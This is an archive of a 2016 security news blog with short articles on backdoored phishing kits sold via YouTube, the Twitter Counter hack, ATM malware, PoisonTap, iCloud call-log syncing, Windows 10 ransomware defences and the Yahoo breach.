Friday, 25 November 2016

Phishing Templates Advertised on YouTube

Scammers are abusing YouTube as a new way to promote backdoored phishing templates and provide potential buyers with information on how to use the nefarious software, Proofpoint researchers warn.

Because cybercrime is a business, crooks are constantly searching for new means to advertise their products to increase gains. For some, YouTube seemed like a good selling venue, and they decided to promote their kits on this legitimate website.

A search for “paypal scama” returns over 114,000 results, but buyers are in for a surprise, Proofpoint reveals. To be more precise, while the kits work as advertised, they also include a backdoor that automatically sends the phished information back to the author.

Proofpoint security researchers stumbled upon several YouTube videos that linked to phishing kits, templates, or to pages offering more information on these. The videos were created to show what the templates looked like and to instruct potential buyers on how to collect the phished information.

One of these videos, for example, showed an Amazon phishing template meant to replicate the legitimate login page on the web portal. The video’s authors instructed interested parties to contact them via a Facebook page.

When analyzing the code taken from another example of a phishing template that has been downloaded from a link on a similar video, the security researchers found the author’s Gmail address hardcoded in it. Thus, the author would receive the results of the phish each time the kit was used.

The same kit included a secondary email address that was also receiving the stolen information. What the security researchers didn’t manage to figure out was whether the same author included both addresses in the code or someone else added the second one and decided to redistribute the kit.

A PayPal scam analyzed by the researchers revealed that the cybercriminals attempted to avoid suspicion by adding a PHP include for a file called style.js just before the PHP “mail” command is used to send the stolen credentials. The style.js file, however, was found to include more encoded PHP code. The hidden command in the code was also meant to send the phished information to the author.

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” Proofpoint says.

The security researchers say that they found multiple samples where the authors included backdoors that allow them to harvest the phished credentials even after other actors purchased the templates to use them in their own campaigns. The victims of phishing attacks suffer the most, because they have their credentials stolen by multiple actors each time the backdoored kits are used.

Tuesday, 22 November 2016

Facebook built censorship tool to get into China despite human rights risks

Facebook wants to be unbanned in China, so it’s built a censorship tool that could hide posts about prohibited topics from people in China, according to The New York Times‘ Mike Isaac. Rather than censor posts itself, Facebook would potentially provide the tool to a third-party in China such as a local partner company that could use it to prevent users in China from seeing content that breaks the government’s rules.
While China could unlock huge amounts of users and ad revenue for Facebook, the censorship tool could also be used to enact human rights abuse. If China could track which local users are trying to protest or bad-mouth the government, they could face persecution.
Perhaps that’s why The New York Times says several Facebook staffers who worked on the product have left the company. So far, there are no signs that Facebook has offered the tool to Chinese authorities. We don’t have details on the specifics of how it would work. It’s apparently only one of several ideas Facebook has explored for getting access to China, and they might never be launched.
But the existence of the tool brings up strong concerns about what’s best and safest for Chinese citizens.
Mark Zuckerberg has held in the past that some Facebook access could benefit them. The New York Times reports that at an internal Q&A about its intentions in China, Zuckerberg said, “It’s better for Facebook to be a part of enabling conversation, even if it’s not yet the full conversation.”
That mirrors Facebook’s stance about internet access, where it’s pushed the idea that limited free access to the web is better than none at all for those who can’t afford it. Facebook already allows Chinese companies to buy ads that run in places where it isn’t banned.
In a statement to TechCrunch, a Facebook spokesperson wrote: “We have long said that we are interested in China, and are spending time unders
tanding and learning more about the country. However, we have not made any decision on our approach to China. Our focus right now is on helping Chinese businesses and developers expand to new markets outside China by using our ad platform.”
Over time, the interpersonal connection via Facebook could strengthen communities who might be able to organize and protest the government outside of the app. Yet the censorship tool’s potential to be used to round up dissidents looms over any long-term benefit for citizens, or profit for Facebook.

Trump Mentions Cyber in 100-Day Plan

In a Monday evening video message, Donald Trump discussed how he intends to address trade, energy, regulation, national security, immigration and ethics-related issues during the first 100 days of his presidency—and he also addressed cybersecurity, very briefly.
Characterizing his agenda as "putting America first," the president-elect said that cyber-attacks from foreign governments and non-state terrorist actors is "one of our most critical national security concerns.”
Details were few, but the Republican pledged to create a Cyber Review Team to provide safeguarding recommendations and establish protocols and awareness training for government employees. He also said that he would direct the Department of Defense and the chairman of the Joint Chiefs of Staff to develop a comprehensive plan to protect the United States' infrastructure from cyber-attacks, as well as all other forms of attacks, during his first 100 days in office.
Rick Hanson, the executive vice president at Skyport Systems, said via email that “It’s not enough for a president to ask the DoD and JCS to develop a comprehensive cyber-plan, that has nothing new. We as a country need a clear focus from the top of the food chain down. A cabinet position that focuses on cyber as well as a strong focus and knowledge of the implications by the president himself. We can no longer rely on other agencies to build a plan."
Lastly Hanson added, "A plan must be built and executed by those who have an intimate knowledge of cyber-infrastructure and the threat landscape that not only exists but is possible. The sooner we secure our infrastructure from the core, the more efficient we will be in maintaining the security of our cyber-infrastructure. Regulations and guidelines must exist that define what our core infrastructure looks like from the bare metal. Security at the hardware level is essential for a truly secure infrastructure."

Monday, 21 November 2016

Twitter Celebs and Corporate Accounts Hacked Through Third Party

A third party Twitter site was hacked over the weekend and various celebrity and media accounts taken over to promote an “increase Twitter followers” service.
Twitter Counter, which claims to be the ‘#1 stat site powered by Twitter’ posted the following on Saturday:
“We can confirm that our service has been hacked; allowing posts on behalf of our users! We have launched an investigation into this matter.”
Earlier, countless celebrity accounts including those of Charlie Sheen and Lionel Messi, as well as the likes of Sky News, The New YorkerThe Next Web, and The Economist posted tweets on behalf of a site claiming to increase users’ Twitter followers.
Even the Twitter accounts of the US National Transportation Safety Board (NTSB), Playstation and Xbox were compromised.
Twitter Counter subsequently confirmed that it had addressed the problem and hackers can’t post on its users’ behalf any more.
It’s unclear exactly how the cyber attack on the firm occurred, but it has been quick to reassure customers with the following update:
“We ensure the privacy of our users' information. We do not store credit card information and we do not keep Twitter account passwords.”
Although the hackers appear to have focused their efforts on taking over high profile accounts with many followers, regular users would probably still do well to change their passwords and switch on two-factor authentication.
The incident is also a reminder of the potential security risk of linking one’s social accounts to third party services like Twitter Counter, as they can provide another way for hackers to attack.
In September, Twitter joined a new industry coalition designed to improve cybersecurity standards.
The Vendor Security Alliance (VSA) will help businesses assess how secure the companies they’re looking to partner with are to ensure there are no weak links in the chain.

FBI: US ATMs Could Be Hacked to Spew Cash

The FBI is warning that potential ATM attacks, similar to those in Taiwan and Thailand that caused ATMs to dispense millions, could happen in the US.
The FBI said in a recent bulletin that it was “monitoring emerging reports indicating that well-resourced and organized malicious cyber-actors have intentions to target the US financial sector.” Now, the Wall Street Journal has reported that the threat could be linked to malicious software used by the Russian gang known as Buhtrap, known for stealing money thorugh fraudulent wire transfers. Sources said that the group has been testing ATM hacking techniques on Russian banks, and will soon look to try them out on financial institutions in other countries.
The first such attack on an ATM system was reported in the Taiwanese capital Taipei in July, after 22 thieves made off with $2.6 million from ATMs around the country by causing them to spit out cash. Criminals from eastern Europe and Russia are said by police to have used malware to infiltrate cash machines run by First Commercial Bank. Three suspects were eventually arrested in Taipei and north-east Taiwan, with around half the money recovered.
A similar attack was reported at the Government Savings Bank in Thailand the following month. There, the Ripper malware was used in a sophisticated campaign to steal 12 million baht (£265,400) from ATMs in Thailand. Ripper targets three major global ATM manufacturers, and is unusual in that it interacts with the targeted machine via a specially crafted bank card featuring an EMV chip which acts as an authentication method.

Sunday, 20 November 2016

China adopts tough law on cyber-security

China today adopted a tough cybersecurity law which it said was aimed at safeguarding sovereignty on cyber space and national security, and to deal with related risks at home and abroad.
The new law was passed by China's legislature, the National 
According to the new law, the government will take measures to "monitor, defend and handle cybersecurity risks and threats originating from within the country or overseas sources, protecting key information infrastructure from attack, intrusion, disturbance and damage".
Efforts will also be made to punish criminal activities online and safeguard the order and security of cyberspace, state-run Xinhua news agency reported.
Under the new law, individual users and organisations are not allowed to jeopardise security on the Internet or use it to "damage national security, honour and interests".
Online activities that are attempts to overthrow the socialist system, split the nation, undermine national unity, advocate terrorism and extremism are all prohibited, according to the provisions, which also forbade activities including inciting ethnic hatred, discrimination and spreading violence and obscene information online.
The law was passed at the bimonthly session of the NPC Standing Committee, which concluded today, after a third reading.
China administers internet with massive firewalls to protect from outside interventions.
It also effectively banned social media outlets like Facebook and Twitter, and controls the local social media sites like Weibo through the firewalls blocking any content that harms the ruling Communist Party of China and the government.

Now Facebook users can automatically launch ''Safety Check''

Facebook will now allow its 1.2 billion users to automatically launch its crisis response tool, "Safety Check".

According to a report by on Thursday, this change will allow the community to decide the urgency of the nearby danger, something Facebook has struggled to grasp.

In the areas of immediate danger, Safety Check allows people to notify their family and friends that they are safe. This feature of Facebook has been used during natural calamities and terrorists attacks across world. 

"When Facebook had control of Safety Check, it had a high standard of what counted as a disaster. A typhoon in the Philippines might have six inches of water in your house, and in California, that'd be a big deal. But in the Philippines, we did research there, and people said this wasn't a big deal," quoted Peter Cottle, Facebook's lead engineer on crisis response. 

"In the past two years, Facebook turned on Safety Check 39 times. Compare that to 335 dangerous events flagged by its community-based Safety Check tool since the company began testing it in June. One of the first instances of a community-generated Safety Check was the Orlando nightclub shooting in June," the report said. 

Facebook considers an event as not being an emergency if the users ignore the Safety Check, which then fades itself. 

"We can tell how many people are spreading this and marking themselves safe, and how quickly it's growing. There's a real strong measure of urgency based on the rapidness of the people who are using the tool," Cotte said. 

However, Facebook has been criticised for being selective when it comes to launching Safety Check tool during a crisis. 

In November 2015, Facebook CEO Mark Zuckerberg had responded with a facebook post saying, ""We care about all people equally, and we will work hard to help people suffering in as many of these situations as we can." 

Reports said that Facebook was also testing out a Community Help page that "users can access after checking in as safe. There, users can post if they need shelter, food or supplies, or if they can provide any of those resources". 

The Community Help feature is expected to be available by January 2017.

Saturday, 19 November 2016

If you use iphone , Call Logs Quietly Synced to iCloud, Forensics Firm Warns

A log of all phone calls made from iPhone devices running iOS 8 or newer may be automatically synchronized to iCloud and susceptible to third-party access, digital forensics and IT security solutions provider Elcomsoft has warned.

The issue, Elcomsoft’s Oleg Afonin explains, is not only that call records are synced to iCloud (when iCloud is enabled) regardless of whether the user wants that to happen or not, but also that iCloud data is loosely protected. Thus, if user’s calls are synced to the cloud, Apple themselves and third-parties with access to the proper credentials could extract them.
What’s more, all of the information stored in iCloud is available for law enforcement upon request, unlike data stored exclusively on the device, which Apple has said numerous times it cannot access.
In fact, Apple entered a spat with the FBI earlier this year when it refused to help decrypt the iPhone of San Bernardino shooter Syed Rizwan Farook, claiming that the Bureau was actually requesting a backdoor to be included in all iPhone devices. Eventually, the FBI received help from a third-party firm, but the quarrel went viral as large tech companies expressed their support for Apple. Some even announced plans to improve their encryption to provide users with increased privacy.

“On devices running iOS 8 and later versions, your personal data is placed under the protection of your passcode. For all devices running iOS 8 and later versions, Apple will not perform iOS data extractions in response to government search warrants because the files to be extracted are protected by an encryption key that is tied to the user’s passcode, which Apple does not possess,” Apple says.
However, the same is not true about data saved on iCloud, because the same encryption level no longer applies to it. In Afonin’s opinion, the cloud syncing functionality is actually a blessing for forensic researchers and law enforcement agencies, as they can access user information that would otherwise be out of reach, because of the privacy features in iOS.  
“The ability to extract call logs from the cloud instead of having to deal with the tough hardware protection of todays’ iPhones can be a blessing for forensic examiners,” Afonin says.

For users, however, this is a privacy nightmare. Not only is access to their data much easier, for Apple and for anyone with the right credentials, but the synced data – in this instance, call logs – is visible on all devices on which the same Apple ID is used.
If a user has two iPhones but a single Apple ID, the calls will appear on both devices. If two people share the same Apple ID, they will have visibility into each other’s calls. What’s more, if one of them clears the calls list on their device, the other user/device will be impacted as well.
The only way to avoid that, Elcomsoft says, is to disable iCloud Drive functionality on the iPhone. The move will not affect features such as iCloud Photo Library or iCloud backups, but will affect the syncing of data for third-party apps that rely on iCloud Drive for that. Increased privacy, it seems, comes at a cost.

Thursday, 17 November 2016

Google and Facebook ban fake news sites from their advertising networks

While it would have been nice to tackle this issue before the election, Google and Facebook are finally taking a tiny step in order to fight back against fake news. According to multiple statements, both companies have updated their policies to ban fake news sites from using Facebook’s and Google’s advertising networks.
With the U.S. election, fake news became incredibly popular on social networks, such as Facebook, Twitter and YouTube, as well as news aggregating services, such as Google News and news articles in Google search results. We’re not talking about opinion articles — we’re talking about reports spreading blatantly inaccurate information.
Google first updated its policy saying that the company will try to ban sites that “misrepresent, misstate, or conceal information.” Websites who don’t comply with this rule will get banned from using Google AdSense.
When it comes to Facebook, the company has also updated its policy to rule out fake news sites from using Facebook Audience Network.
Google AdSense and Facebook Audience Network let content publishers display ads on their websites. Google and Facebook manage the ad inventories, content publishers get a cut for clicks or impressions.
Both companies already have strict policies for their ad networks. For instance, you can’t use Google AdSense on a porn website. Google uses a combination of algorithms and human moderation to decide whether a site is eligible to use its advertising service.
By removing a potential revenue stream, it makes the business of fake news a bit less lucrative. For instance, Buzzfeed discovered that more than 100 fake news sites were created in a tiny city in Macedonia. So it’s clear that it’s not just about influencing the election — people are taking advantage of social networks to make money using fake news.
But there will always be alternative revenue streams, so this move is not enough. Reducing the reach of these websites is the best way to prevent fake news sites from popping out. If Facebook, Twitter, Google News and other websites flagged fake news appropriately, then there would be no reason to create fake news sites in the first place.

FIFA Hackers Steal $16 Million from EA

A hacker has been convicted of embezzling $16 million from gaming bigwig Electronic Arts, using “FIFA coins,” an in-game virtual currency for a soccer-themed video game.
Anthony Clark, 24, of Whittier, Calif., was convicted of wire fraud by a jury sitting in Fort Worth, Texas. Clark and three co-conspirators gamed the game, as it were. You see, in the FIFA Football game, players can earn FIFA coins based on the time they spend playing. People like soccer, and due to the popularity of FIFA Football, a secondary market has developed whereby FIFA coins can be exchanged for US currency. 
Clark and his buddies managed the ultimate hat trick: They circumvented multiple security mechanisms created by EA in order to fraudulently obtain FIFA coins worth over $16 million. Specifically, the group created software that fraudulently logged thousands of FIFA Football matches within a matter of seconds, and as a result, EA computers credited them with improperly earned FIFA coins.  They then subsequently exchanged their FIFA coins on the secondary market for over $16 million.  
Co-conspirators Nick Castellucci, 24, of N.J.; Ricky Miller, 24, of Arlington, Texas; and Eaton Zveare, 24, of Lancaster, Va., previously pleaded guilty and they await sentencing. 
Interesting, the issue with FIFA coins in not new. In 2014, a member of an international hacking ring responsible for stealing between $100 and $200 million in intellectual property and other proprietary data from Microsoft’s Xbox gaming platform developed a software exploit that did something similar to what Clark and crew accomplished. The exploit generated millions in in-game, virtual currency for Electronic Arts’ FIFA line of soccer games, which he then sold in bulk quantities on the black market.
That same ring was also accused of stealing a pre-release version of Epic’s video game, Gears of War 3; and a pre-release version of Activision’s uber-popular video game, Call of Duty: Modern Warfare 3. Gaming is a high-profile target given the billions that the industry rakes in every year.

Cybersecurity – Just Like Sex, Drugs & Rock ‘n’ Roll

There is no technical solution to a behavioral problem.
In light of relentless data breaches is endpoint protection software still fit for purpose? People naturally behave in insecure ways, and addressing this through education and awareness is a key challenge for the cybersecurity industry. Focusing solely on technological measures to defeat cyber-criminals will always be a losing battle, so instead of trying to resolve the symptoms we must address the root cause. 
Early social engineering tactics, such as the “Nigerian Prince needs your help” 419 scam, involved little technology. The cyber-criminals would send vast numbers of spam emails and simply wait for a victim to respond. The remainder of the scam would be executed via emails, phone calls or in person; it relied on the greed or gullibility of the victim to ensure they continued co-operating with the criminals.
Over time the cyber-criminal’s tactics have evolved and become more sophisticated, using complex social engineering techniques and malware. Nevertheless, the root cause remains the same. The victim must actively participate in the initiation of the scam, by opening an attachment, clicking on a link, or responding to an email. Our collective obedience in the face of perceived authority, desire to help others, willingness to get our jobs done in a high intensity business environment and natural curiosity simply work against us.
Over time the cyber-criminal’s tactics have evolved and become more sophisticated, using complex social engineering techniques and malware. Nevertheless, the root cause remains the same. The victim must actively participate in the initiation of the scam, by opening an attachment, clicking on a link, or responding to an email. Our collective obedience in the face of perceived authority, desire to help others, willingness to get our jobs done in a high intensity business environment and natural curiosity simply work against us.
However, we shouldn’t throw our hands in the air, accept the inevitable and give up just. There are simple but effective approaches to reducing the risk, and it starts with education. Within the anti-phishing and secure email platform space, vendors are now offering training and awareness technologies with their security solutions. Instead of simply blocking attacks and quarantining emails, they give the user the opportunity to open the email, click on the malicious link to provide their real username and password to a fake website, or perform an otherwise insecure action – after the threat has already been quietly neutered. These platforms then direct the user to an educational system that explains why the email was malicious and what the user should have done instead.
These very effective systems are mainly confined to email and web security services. Extending these systems to endpoint security platforms is considerably more complex and somewhat impractical, especially in the context of unknown threats.
Modern anti-virus packages are extremely efficient. Based on AVTest results, the market leaders boast a 99.9% or higher detection rate for common malware. So, assuming the user doesn’t simply ignore the warnings and allows malware to launch, a decent up-to-date anti-virus package will protect against the vast majority of threats. That just leaves the difficult 0.1% to deal with – the zero-day threat.
Zero-day malware is unknown to traditional anti-virus products that use ‘known bad’ signatures to detect and identify malicious code. If these zero-day threats are unknown and undetectable, how can they be defeated? In theoretical terms there is an easy solution: whitelisting. Instead of taking the normal anti-malware approach of allowing all software to run and trying to detect which may be malicious, whitelisting defines a specific set of ‘known good’ applications. This whitelisted software is allowed to run unimpeded, and everything else is blocked.
This is a strong way to prevent malicious software from executing, but for many it’s impractical, expensive, time consuming and inflexible. The level of effort combined with the impact it has on organizations’ ways of working is something many aren’t willing or able to undertake.
So what is the solution?
Bluntly, there isn’t one panacea. Applications, operating systems and hardware will continue to become more complex, the Internet of Things will continue to expand and provide new routes for attackers to exploit, and with greater complexity comes greater opportunity for vulnerability. People will always slip and behave in insecure ways, regardless of vigilance. We can produce the usual list of ‘best practices’:
•    back up your data
•    don’t re-use passwords
•    ensure your anti-virus, email software, web browser and other security technologies are up to date
But these are messages people have heard many times before, and they mostly address the symptoms, not the root cause.
The key is to reduce that root cause risk as much as possible, and this brings us back to behavior. Technology and the internet is a fact of life and the majority of people are well aware that ‘cybercrime exists’: it’s a mainstream media story with incidents reported on a near-daily basis. However, it’s a minority of people who can reliably spot a carefully crafted phishing email, or a spoof website designed to steal usernames and passwords, and that’s one of the big reasons why cyber-criminals continue to succeed in their malicious endeavors.
This is why education and awareness is key. People must accept that although they are not expected to be technology experts, they have a personal responsibility to educate themselves on spotting issues and safely using the technology they work with every day – just as they may not be mechanics, but they still know how to own and operate a vehicle safely. Experience has shown that companies with the greatest success against cybersecurity threats usually run security awareness programs for their staff, which inevitably go hand in hand with a carefully thought out cybersecurity strategy.
As stated within Objective 4 of the UK Government’s cybersecurity strategy:
“Raise awareness amongst the public and businesses of the threat and the actions they can take to protect themselves.” Just like sex, drugs & rock ‘n’ roll – we have to adapt our own behavior to get all of the benefits and minimize the chance of short, medium or long-term damage.

Wednesday, 16 November 2016

$5 PoisonTap Device Cracks Open Locked Computers

A $5 tool called PoisonTap can allow malicious actors to easily hack into a locked computer.
Discovered by well-known independent white-hat hacker and developer, Samy Kamkar, PoisonTap siphons cookies, exposes internal routers and installs web backdoors on locked computers.
A physical device, PoisonTap simply needs to be plugged into a locked or password-protected computer to work its black magic. It emulates an Ethernet device over USB, and hijacks all internet traffic from the machine (despite being a low priority/unknown network interface).
In all, it allows the attacker to remotely force the user to make HTTP requests and proxy back responses (GET & POSTs) with the user’s cookies on any backdoored domain. It exposes the internal router to the attacker, making it accessible remotely via outbound WebSocket and DNS rebinding, and installs a persistent web-based backdoor in HTTP cache for hundreds of thousands of domains and common Javascript CDN URLs, all with access to the user’s cookies via cache poisoning. On the cookie front, it stores HTTP cookies and sessions from the web browser for the Alexa top million websites.
“PoisonTap is built for the $5 Raspberry Pi Zero without any additional components other than a micro-USB cable and microSD card, but can work on other devices that can emulate USB gadgets such as USB Armory and LAN Turtle,” Kamkar explained in an analysis. “PoisonTap produces a cascading effect by exploiting the existing trust in various mechanisms of a machine and network, including USB, DHCP, DNS, and HTTP, to produce a snowball effect of information exfiltration, network access and installation of semi-permanent backdoors.
A video demonstration of just how easy it is to use can be found here.
While the initial compromise of the device requires physical access, consequent access to the machine can be pulled off remotely. The backdoors and remote access persist even after device is removed and attacker “sashays away,” Kamkar noted.
The discovery represents a new threat vector. “There have been attacks that look similar to the PoisonTap; however, this one is exploiting a completely different system weakness,” said Craig Smith, research director of transportation security at Rapid7, via email. “A key difference with PoisonTap is that it emulates a network device and attacks all outbound communications from the target system. This attack works on both Windows and Mac operating systems, and can hijack a large number of connections, even if the machine is locked. If a user gets up to use the restroom—or even if it's a kiosk that has disabled the keyboard, but the interface is a web backend—this device will still work.”
He added, “The brilliance of the attack is actually in its simplicity: the most complex code in PoisonTap is the beautiful HTML5 canvas animation by Ara. On a $5 Raspberry Pi, Samy pulled together several clever attacks that add up to something really masterful.”

Tuesday, 15 November 2016

Mobile Workers Still Using Insecure Free Wi-Fi

Two-thirds of mobile workers are worried about the security implications of using free Wi-Fi hotspots, yet nearly half (42%) still access corporate networks via them, according to iPass.
The mobile connectivity firm polled over 1,700 business travelers to better gauge their technology habits, preferences and expectations on the road.
It revealed several mobile security trends which should concern CISOs.
Aside from the use of insecure free Wi-Fi, half said they’re allowed to use a personal device to access the corporate network, while over a third (38%) claimed they’d never used a VPN to protect data and comms.
Around three-quarters (72%) said they use free Wi-Fi at airports if it is available, exposing them to the risk of data theft and corporate espionage.
Patricia Hume, chief commercial officer at iPass, told Infosecurity the survey shows that corporate and employee data security priorities are worlds apart.
She added that banning access to free Wi-Fi on the road isn’t the answer.
“It is important that mobile workers are educated about how to find secure connectivity while on the move rather than using insecure Wi-Fi hotspots, as this can help to keep both mobile workers and enterprise security safe,” argued Hume.
“Businesses need to ensure they are making the effort to develop and implement a robust safe mobile usage policy and educating mobile workers on the importance of security while on the go.”
Although many IT departments mandate the use of corporate VPNs, low technical expertise may mean employees look for alternative ways to get online.
“Businesses need to take a clear step forward and ensure that corporate VPNs are used by employees when secure connectivity isn’t guaranteed,” concluded Hume.


A lobbying organization that includes some of the Internet’s most valuable entities made a plea to President-Elect Donald Trump to support the expansion of strong encryption and reform government surveillance activities. The Internet Association on Monday sent a letter to Trump’s transition team that included a number of policy suggestions beyond the realms of security and privacy in the name of online innovation and economic growth.

The letter supports an open Internet and asks Trump to prioritize security and privacy among other ideals in order to preserve online commerce. “From standardizing data security and breach notification, to protecting encryption standards across digital technologies, leaders in public office must recognize the importance of the internet as a place where people can share their information and ideas and start and grow their businesses from anywhere in the United States,” said Michael Beckerman, president and CEO of the Internet Association, which counts Amazon, Facebook, Google, Netflix, PayPal, Twitter and Uber among its members.

The privacy and data security section of the letter is predicated on preserving the secure collection of business-related data and how analytics drives economic growth. The organization points out that companies reliant on data analytics are more productive and profitable, and that Americans benefit via lower prices and improved services. 

The letter highlights regulatory proposals that threaten the value of data and urges Trump to champion what it calls “data innovation.” This includes taking a harms-based approach to consumer privacy, instead of a collection-based approach, and stopping data minimization efforts or other proposals that would inhibit innovation,” the letter states. “In addition, federal enforcement agencies should focus on data security, partner with consumer groups to drive security best practices, and commit more resources to fight identity theft. Finally, policies should enable teachers to use online tech to boost educational outcomes for students.”

 Trump’s rambling stance on cybersecurity during the debates did little to inspire confidence in his understanding of the issues. “The security aspect of cyber is very, very tough,” Trump said during the third debate. “And maybe it’s hardly doable. But I will say we are not doing the job we should be doing. But that’s true throughout our whole governmental society. We have so many things that we have to do better, and certainly cyber is one of them.”

Trump’s cybersecurity website explains his vision, which starts with a review of cyber defenses and vulnerabilities by a Cyber Review Team made up of public and private sector experts. Trump’s site also says the Justice Department will create task forces to coordinate local and government responses to threats. On the offensive side, Trump is looking for enhancements to U.S. Cyber Command from the Secretary of Defense and the Joint Chiefs that will allow the U.S. to respond to state and non-state actors if necessary. Experts are also concerned about Trump’s views on the FBI’s ongoing struggle with strong encryption and what it calls Going Dark. The Internet Association urged him to support strong encryption as a plus to national security and individuals’ rights. 

“Laws that require companies to engineer vulnerabilities into products and services harm personal privacy and endanger national security,” the letter states. “Support for strong encryption makes America more secure.” The letter also asks Trump to consider reforms to Section 702 of the FISA Act, as well as Executive Order 12333, which allows the government to use secret court orders to obtain data from service providers and technology companies. The Internet Association also asked Trump to consider reforms to the outdated Electronic Communications Privacy Act governing stored communication. “Internet users must have the same protections for their inbox as they do for their mailbox. 

Updating ECPA to include a warrant for content stored across technologies, regardless of where it is stored or for how long, is overdue,” the letter states. “ECPA must be updated to reflect the significant role that internet commerce plays in global commerce.”

Monday, 14 November 2016

Microsoft Details Anti-Ransomware Protection in Windows 10

Microsoft’s latest desktop operating system release, which started rolling out to users in early August in the form of Windows 10 Anniversary Update, is packing improved ransomware resilience, the Redmond-based tech giant says.

Numerous new ransomware variants have emerged over the past 12 months alone, swith popular threats including Locky, CryptXXX, and Cerber, which target Windows, and Microsoft appears determined to tackle them at the OS level. Other platforms aren’t safe from ransomware either, as variants such as Linux.Encoder, KeRanger, and Lockdroid have shown.
Microsoft decided to make Windows more ransomware-resilient because the number of such threats spotted in the wild in the past 12 months has more than doubled, Rob Lefferts, Director of Program Management, Windows Enterprise and Security, Microsoft, says. The company integrated the Windows 10 Anniversary Update with the necessary technology to protect against these threats, and now it has decided to detail them in a newly published whitepaper (PDF).

Some of the enhanced security features in the latest platform update include email protection that blocks malware sent through suspicious URLs or attachments, along with anti-exploit protection in Microsoft Edge, meant to block malicious code from silently downloading and executing an additional payload on the victim’s system.

On top of that, there’s the Windows Defender Advanced Threat Protection (ATP) that Microsoft revealed in March. Additionally, Microsoft packed both Office 2016 and Office 2013 with macro-blocking features, which should prevent document-borne ransomware and other types of malware from being executed on vulnerable computers.
As Lefferts explains, the purpose of different ransomware variants is the same: to infect the device and then deny access to files on it or to the entire device. What differs, however, is the method that attackers use of perpetrate their attacks.

To ensure that ransomware is successfully blocked, Microsoft packed Windows 10 not only with the above mentioned security features, but also with new technology in Windows Defender, so that detection happens in seconds, before infection occurs, Lefferts says. Other Windows 10 security capabilities include Credential Guard, Windows Hello and others, all meant to turn Windows 10 Anniversary Update the most secure Windows version.

Windows 10 devices are 58% less likely to encounter ransomware compared to those running Windows 7, Microsoft explains. The tech giant also explains that its strategy to stop ransomware involves prevention, detection, and response. Thus, the company didn’t focus only on stopping ransomware before it reaches the device, but also on blocking it from running on compromised machines and on providing the necessary intelligence to IT and Security professionals.

Related to prevention, Lefferts mentions browser hardening, where Adobe Flash Player, the most commonly exploited browser plug-in, runs in an isolated container in Microsoft Edge. There’s also email protection, where attachment types most popular among cybercriminals are blocked, and machine learning, where cloud infrastructure is leveraged to identify and block malware more quickly.

Better detection is available through a new and improved Windows Defender, which is enabled by default in Windows 10. “We’ve also improved Windows Defender’s behavioral heuristics to help determine if a file is performing ransomware-related activities, and then detect and take action more quickly,” Lefferts says.

The Windows Defender ATP in Windows 10 Anniversary Update allows companies to detect attacks that have impacted others. The service combines security events collected from the machines with cloud analytics and should be able to detect signs of attacks and alert the enterprise security team. Details on ransomware attacks would be available in the Windows Defender ATP console, allowing respondents to determine where it might be moving next in the network.

The aforementioned whitepaper details even more of the security enhancements that Microsoft packed inside Windows 10 Anniversary Update. To take advantage of them, the tech company says, users should update their devices as soon as possible.

Sunday, 13 November 2016


The breach was disclosed in September and Yahoo blamed state-sponsored attackers, a claim that was challenged by some experts who instead said a criminal outfit was behind the attack and may have sold some of the data to an Eastern European government.

The SEC filing also contains a confirmation from Yahoo that Verizon’s multibillion-dollar acquisition of Yahoo’s core business could be in jeopardy, and that Verizon could seek to terminate or renegotiate the terms of the sale. Verizon executive vice president Marni Walden said at a Wall Street Journal event 10 days ago that it was still moving forward with the acquisition, but according to the Journal, stopped short of saying that it would not put a halt to the deal if necessary. “What we have to be careful about is what we don’t know,” Walden said. “We’re not going to jump off a cliff blindly so we need to have more information before we can determine, but strategically the deal still makes a lot of sense to us.”

Yahoo said that claims in July from hackers that 200 million account credentials were available for purchase on an underground hacker forum prompted a deeper investigation into the security of its network and a broader look at the 2014 intrusion.

“In addition, the forensic experts are currently investigating certain evidence and activity that indicates an intruder, believed to be the same state-sponsored actor responsible for the Security Incident, created cookies that could have enabled such intruder to bypass the need for a password to access certain users’ accounts or account information,” Yahoo told the SEC. It added that on Monday, law enforcement shared evidence provided by a hacker that is allegedly legitimate Yahoo account information; Yahoo said it is investigating. Yahoo told the SEC that the stolen information included names, email addresses, telephone numbers, dates of birth, hashed passwords and encrypted and unencrypted security questions and answers.

Yahoo reaffirmed earlier statements that no payment card data or bank account information was stolen; that information, Yahoo said, was not stored on the systems that were accessed. News of the Yahoo breach surfaced at a time when large-scale password dumps were being disclosed in waves. Most of the Yahoo passwords were hashed using bcrypt, but some were secured with MD5, a long-outdated algorithm that is considered unsafe and has been deprecated in many corners. Security company Venafi said in late September that data collected from its internal certificate reputation service indicates that Yahoo’s cryptographic practices were a mixed bag of outdated hashes and self-signed certificates, none of which are entirely secure. Beyond simply the use of SHA1 and MD5, for example, Venafi said that it found a wildcard certificate with a five-year expiration data, much longer than the standard 12- to 18-month standard.

 It added that 27 percent of certificates on external Yahoo sites were in place since January 2015 and that fewer than 3 percent were issued in the previous 90 days. Weakened certificates have been attacked in the past to redirect traffic or pose as a Yahoo site and steal credentials or intercept traffic. Congress soon interjected and wrote a letter to CEO Marissa Mayer demanding to know why it took Yahoo two years to disclose the attack, expressing dismay that users’ data has been exposed during that period of time. Vermont Senator Patrick Leahy called the situation “unacceptable.” 

The breach, Yahoo told the SEC, has also given birth to 23 class-action lawsuits filed against the company making claims of harm and seeking damages and relief. Yahoo said it has spent $1 million in the third quarter of this year related to its breach investigation, but said the breach did not materially impact its business or cash flow for the quarter. Yahoo also admitted in its filing that it does not have cybersecurity liability insurance.

See more at: Yahoo Tells SEC It Knew About Data Breach in 2014

Sixth Individual Arrested in Connection with, Links to JPMorgan Hack

A Florida man is the latest person to be charged in connection with alleged illegal activities associated with, a now defunct unlicensed bitcoin exchange. Riccardo Hill, a resident of Brandon, Florida was charged with conspiring to operate an unlicensed money transmitting business. He was released Thursday on a $75,000 bond following a court appearance in Manhattan.

Hill, 38, was arrested in October. He is the ninth person to be arrested following the investigation into the JPMorgan data breach that was disclosed in 2014. Prosecutors claim that was owned by Gery Shalon, an Israeli charged with masterminding the hacks that breached JPMorgan and other companies.

Shalon, and Ziv Orenstein (another Israeli) were arrested in Israel in July 2015. They were extradited to the US and pleaded not guilty to a hacking and fraud scheme including but not limited to JPMorgan. Prosecutors said the scheme dated back to 2007 and compromised more than 100 million people's personal information.

